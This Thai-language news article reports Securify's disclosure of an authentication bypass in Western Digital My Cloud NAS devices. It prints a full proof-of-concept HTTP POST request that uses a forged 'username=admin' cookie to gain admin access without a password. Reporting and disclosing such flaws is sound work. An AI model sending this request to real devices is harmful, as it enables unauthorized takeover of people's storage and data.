Securify ได้ออกมาเผยแพร่ถึงการค้นพบช่องโหว่บน Western Digital (WD) My Cloud อุปกรณ์ NAS Storage ยอดนิยม ที่ผู้โจมตีสามารถทำการเข้าถึงสิทธิ์ระดับ Admin ได้จากระยะไกล
ช่องโหว่นี้เกิดขึ้นจากการที่ WD My Cloud นั้นจะทำการสร้าง Admin Session ที่ผูกเอาไว้กับ IP Address เป็นหลัก ดังนั้นเมื่อผู้โจมตีทำการส่งคำสั่งใดๆ ไปยัง Web Interface ของระบบด้วยการใช้ HTTP CGI Request ก็จะสามารถทำการตั้งค่า username=admin ส่งเข้าไปทาง HTTP CGI Request เท่านั้น
ถ้าการผู้โจมตีทำการส่งข้อมูลเข้าไปในรูปแบบที่ถูกต้อง ผู้โจมตีก็จะสามารถเข้าถึงสิทธิ์ระดับ Admin ของระบบได้ทันทีโดยไม่ต้องใส่รหัสผ่าน ซึ่งโค้ดสำหรับทำ Proof-of-Concept ก็มีดังนี้
POST /cgi-bin/network_mgr.cgi HTTP/1.1
Host: wdmycloud.local
Content-Type: application/x-www-form-urlencoded
Cookie: username=admin
Content-Length: 23
cmd=cgi_get_ipv6&flag=1
ทาง Securify ได้ทำการแจ้งช่องโหว่ดังกล่าวไปยัง WD แล้วตั้งแต่เดือนเมษายน 2018 ที่ผ่านมา แต่ก็ยังไม่ได้รับการตอบสนองใดๆ มาเป็นเวลากว่า 5 เดือน ทำให้ Securify ตัดสินใจออกมาเผยแพร่ช่องโหว่ในครั้งนี้ และปัจจุบันนี้ทาง WD ก็ยังไม่ได้มีการแถลงใดๆ อย่างเป็นทางการ
ผู้ที่สนใจรายละเอียดเพิ่มเติม สามารถศึกษาข้อมูลฉบับเต็มได้ที่ https://www.securify.nl/advisory/SFY20180102/authentication-bypass-vulnerability-in-western-digital-my-cloud-allows-escalation-to-admin-privileges.html ครับ
ที่มา: https://www.theregister.co.uk/2018/09/18/remote_access_vulnerability_western_digital_my_cloud/